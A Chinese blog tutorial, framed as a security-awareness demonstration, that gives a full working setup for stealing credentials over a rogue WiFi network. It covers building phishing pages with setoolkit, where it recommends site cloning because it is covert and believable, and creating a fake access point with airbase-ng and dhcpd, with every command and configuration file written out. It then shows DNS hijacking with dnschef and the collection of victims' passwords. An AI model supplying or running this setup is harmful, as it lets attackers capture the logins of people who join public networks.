实验主要目的是为了让受众警惕非法链接WIFI导致的系列问题,以下所有实验均使用Kali虚拟机实现,仅用于技术分享讨论
钓鱼网站
主要利用setoolkit实现,这是一个社工的集成工具集,让不会代码的你,三分钟学会搭建钓鱼网站
Kali输入命令行后出现启动画面,下面的翻译之前有人翻译过了,我直接拿过来整理了
选项分别为
社会工程学攻击
快速追踪测试
第三方模块
升级软件
升级配置
帮助
选择第一个模块
鱼叉式网络攻击
网页攻击
传染媒介式
建立payload和listener
邮件群发攻击
Arduino基础攻击
无线接入点攻击
二维码攻击
Powershell攻击
第三反方模块
这里选择网页攻击
Java applet攻击
Metasploit浏览器攻击
钓鱼网站攻击
标签钓鱼攻击
网站jacking攻击
多种网站攻击
全屏幕攻击
选择钓鱼网站
网站模板
站点克隆
用自己的网站
这里给我们提供了三种的钓鱼网站方式,我们分别用这三种方式尝试搭建一下钓鱼网站
Web Templates
第一种比较好理解,就是使用已有模板搭建钓鱼网站
比如选择Twitter,即可在我们的本地生成Twitter的登陆页面,看一下效果
访问IP
输入登陆信息
即可在本地监听到数据
Site Cloner
这个比较好理解,直接克隆互联网上开启的站点
找到需要克隆的站点,直接输入网站域名
打开浏览器,访问虚拟机80端口,修改一下显示的数据
成功克隆
成功监听到数据
Custom Import
顾名思义就是让我们自己构造钓鱼网站的代码了,我们需要在本地构造一下代码,这里直接把上面copy站点的代码拿过来用
输入源码所在位置,即可生成网站
以上为使用三种不同方式生成钓鱼网站的方法,个人推荐使用第二种,方便也隐蔽,在登陆之后会自动跳转到真实网页当中去,增加了可信度
钓鱼WIFI
这里需要一个无线网卡
开启无线网卡
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
创建WIFI,这里WIFI名称我设置为了(1nfo)
airbase-ng -e 1nfo -c 11 wlan0
此时WIFI已经成功开启,但是无法进行链接,因为我们没有设置DHCP
PC或者手机链接WIFI无法获取到IP地址,我们需要再打开一个终端配置一下DHCP服务
开启虚拟网卡配置网关
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
同时按照虚拟网卡位置配置DHCP服务器IP
gedit /etc/dhcp/dhcpd.conf
配置:
authoritative;
default-lease-time 700;#默认租约时间
max-lease-time 8000;#设置最大租约时间
subnet 10.0.0.0 netmask 255.255.255.0 { #设置子网属性,netmask关键字指定子网掩码
option routers 10.0.0.1; #指定为客户机分配的默认网关地址
option subnet-mask 255.255.255.0; #指定为客户机分配的子网掩码地址
option domain-name-servers 10.0.0.1;#设置DNS服务器地址
range 10.0.0.10 10.0.0.100; #设置动态分配的IP地址范围
}
之后开启我们的DHCP服务
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
出现如上配置即为配置成功,手机或者PC即可链接该WIFI
DNS劫持
我们可以直接使用最简单的劫持,将所有的访问流量都劫持到我们的网关
dnschef -i 10.0.0.1 --fakeip 10.0.0.1
效果
手机链接WIFI
访问官网
劫持为二次认证登陆页面,需要用户输入用户名和密码
用户输入用户名和密码后,Kali自动获取到密码
无线安全实验汇总 – Pdsdt says:
[…] 这个实验其实本质上不止是一个简单的钓鱼WIFI,还涉及到钓鱼网站的搭建以及DNS劫持的综合实验,这个实验其实已经在我之前博客网络安全宣传周演示:钓鱼WIFI+钓鱼网站+DNS劫持组合拳实现用户信息窃取里面详细介绍过了,这里直接把相关内容转移过来了 […]